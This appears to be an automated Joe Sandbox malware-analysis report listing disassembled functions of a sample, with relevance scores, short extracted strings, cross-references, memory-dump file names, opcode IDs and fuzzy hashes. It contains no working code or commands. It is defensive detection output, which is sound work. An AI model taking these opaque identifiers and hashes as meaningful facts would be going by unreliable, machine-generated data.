Instruction ID: 3d708cac31232f6042d3fee476d4f55e7c208f7b6b0a7be03d855a85e8e8fda7
Opcode Fuzzy Hash: 63c926951b0f24ef55413a7387c647d1e2670e9d3305334fa4fca9c7c5117c5f
Instruction Fuzzy Hash: 7BB249F3A0C2049FE3047E2DEC8567ABBE5EF94720F1A4A3DEAC5C7744E93558058686

Function 0040C62C Relevance: 6.6, Strings: 4, Instructions: 1579COMMON

Download Yara Rule

Strings

&J+o, xrefs: 0040CE67
fsC, xrefs: 0040C91C
c]?v, xrefs: 0040C961
)ae, xrefs: 0040CB28

Memory Dump Source

Source File: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: fsC$&J+o$)ae$c]?v
API String ID: 0-212332944
Opcode ID: 9b9f9d516e51bba788f7e8957e183b51f0efd5ff1dc2ff363f088181c2d58a91
Instruction ID: 197515a139ee72d8bbda7f499efa337eb2a5824206b8819210052f459278d56d
Opcode Fuzzy Hash: 9b9f9d516e51bba788f7e8957e183b51f0efd5ff1dc2ff363f088181c2d58a91
Instruction Fuzzy Hash: 43B227F3A0C2109FE704AE2DEC8567ABBE5EFD4720F16892DEAC497744E63558018787

Function 00402A31 Relevance: 6.4, Strings: 4, Instructions: 1372COMMON

Download Yara Rule

Strings

(&_, xrefs: 00402CD0
Vme, xrefs: 00402C98
GhZ, xrefs: 00403414
'lN", xrefs: 00403891

Memory Dump Source

Source File: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: 'lN"$(&_$GhZ$Vme
API String ID: 0-2812967658
Opcode ID: 910737b7c2f7b1164b79617af3eb8cb86cd769844921079675661d8dd474c0bb
Instruction ID: e6d0ecc6ed114efbbb50434997ce938166401ac4af5274d903af2df37cfb9553
Opcode Fuzzy Hash: 910737b7c2f7b1164b79617af3eb8cb86cd769844921079675661d8dd474c0bb
Instruction Fuzzy Hash: D09239F3A0C2049FE3046E2DEC8567ABBE9EFD4320F1A463DE6C5C3744EA3558058696

Function 0026CBD0 Relevance: 5.6, Strings: 4, Instructions: 555COMMON

Download Yara Rule

Strings

BcPX, xrefs: 0026CD71
`cPX, xrefs: 0026CDAE
`;|9, xrefs: 0026CDFC
8?, xrefs: 0026CE08

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: 8?$BcPX$`;|9$`cPX
API String ID: 0-3600580882
Opcode ID: b9f13d377a9bf47c5ede6ae4f3b6818c3d1a7fe17d156dc6f6a0c2e38d12810b
Instruction ID: 0c533cbc1bd0135114bc7b52b1bc6f3f575ee73398f18b8a6f40cd5ea95cf83f
Opcode Fuzzy Hash: b9f13d377a9bf47c5ede6ae4f3b6818c3d1a7fe17d156dc6f6a0c2e38d12810b
Instruction Fuzzy Hash: C6F1EA71A183568FC320CF24D8917ABBBE0FF81704F148A2DE8D55B280E3759949CBD2

Function 0025E07E Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

OO, xrefs: 0025E89F
|U, xrefs: 0025E8A6
Ex, xrefs: 0025E8AD
%, xrefs: 0025E665

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: %$Ex$OO$|U
API String ID: 0-1698151701
Opcode ID: 04594d6749c5c5b484a17db2d89b82690a6c87e1586f27b94fa242a876ba634c
Instruction ID: 997d5973a6972e1262a8e8044d2eaf9cdb0f73e3a9ca6b3ad2e8009ad79a7a6c
Opcode Fuzzy Hash: 04594d6749c5c5b484a17db2d89b82690a6c87e1586f27b94fa242a876ba634c
Instruction Fuzzy Hash: CBF14234220B019FEB298F24D8D4B3673A2FF88321F55996DDA9747AA5D331F856CB04

Function 003FD6E1 Relevance: 5.3, Strings: 3, Instructions: 1583COMMON

Download Yara Rule

Strings

Oh, xrefs: 003FE876
Z_}, xrefs: 003FE297
lKw, xrefs: 003FE723

Memory Dump Source

Source File: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: Oh$Z_}$lKw
API String ID: 0-3867720788
Opcode ID: 1f855b78758b1fa80a62eb660eb0cd72b95eba01692b47542d954e2c8762d3e4
Instruction ID: cbc28381041aed111cb0232c7cc034088836d7fb4b0ba9bc53e9b07bdbb870df
Opcode Fuzzy Hash: 1f855b78758b1fa80a62eb660eb0cd72b95eba01692b47542d954e2c8762d3e4
